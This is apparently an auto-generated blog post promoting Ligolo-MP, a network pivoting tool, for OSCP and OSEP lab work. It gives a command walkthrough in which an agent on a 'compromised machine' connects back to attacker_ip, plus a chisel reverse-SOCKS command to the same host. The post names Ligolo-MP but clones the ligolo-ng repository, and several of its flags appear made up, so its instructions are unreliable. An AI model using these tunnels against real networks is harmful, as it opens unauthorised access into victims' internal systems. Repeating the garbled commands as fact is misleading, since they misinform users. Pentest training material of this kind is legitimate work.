Listen to this Post
If you’ve used Ligolo before, you know it’s great for tunneling and pivoting. But Ligolo-MP takes it further:
⚡ Automatic Routing: Add a route, and Ligolo-MP builds the tunnel and updates your routing table — no manual steps.
🧹 Clean Removal: Remove the route, and it auto-cleans your routing table. Relay down? Tunnel vanishes cleanly.
🔄 Persistent Listening: Even if an agent disconnects, the server keeps listening and reconnects when it’s back.
🖥️ GUI Insight: Quickly see agent hostnames, tunnel info, and IPs — all in one place.
If you are working on the Offsec labs or prepping for OSCP or even OSEP, Ligolo-MP just makes pivoting smoother, faster, and more reliable than the original.
Download/Repo: Ligolo-MP GitHub
You Should Know: Practical Usage of Ligolo-MP
1. Installation & Setup
Clone the repository git clone https://github.com/nicocha30/ligolo-ng.git cd ligolo-ng Build the agent & proxy go build -o agent cmd/agent/main.go go build -o proxy cmd/proxy/main.go Run the proxy (attacker machine) ./proxy -selfcert -laddr 0.0.0.0:11601 Run the agent (compromised machine) ./agent -connect attacker_ip:11601 -ignore-cert
2. Automatic Pivoting & Routing
Once connected, add a new route:
Add a new subnet to pivot into route add 10.10.10.0/24 Verify routes ip route
3. SOCKS Proxy & Proxychains
Start a SOCKS5 proxy ./proxy -socks5 127.0.0.1:1080 Use with proxychains proxychains nmap -sT -Pn -n 10.10.10.5
4. Port Forwarding
Forward a remote port to local ./proxy -forward 3389:10.10.10.5:3389 Access via localhost rdesktop 127.0.0.1:3389
5. GUI Mode (Web Interface)
Enable web UI ./proxy -http :8080 Access at http://localhost:8080
6. Clean Exit
Remove all routes & tunnels ./proxy -cleanup
What Undercode Say
Ligolo-MP is a game-changer for penetration testers, especially in OSCP/OSEP-like environments. Unlike traditional tools (Chisel, Socat, SSH tunnels), it automates routing, maintains persistence, and provides a clean GUI for monitoring.
Additional Useful Commands:
- Check Active Tunnels:
netstat -tulnp | grep ligolo
- Manual Route Cleanup (If Needed):
ip route del 10.10.10.0/24
- Debugging Connection Issues:
tcpdump -i tun0 -n
- Alternative Tunneling Tools:
Chisel (Alternative) chisel server --reverse chisel client attacker_ip:8080 R:socks
For OSCP aspirants, mastering Ligolo-MP can save hours of manual pivoting.
Expected Output:
A fully automated, GUI-assisted tunneling setup with persistent connections and easy cleanup.
Reference:
References:
Reported By: Activity 7316243890590650369 – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
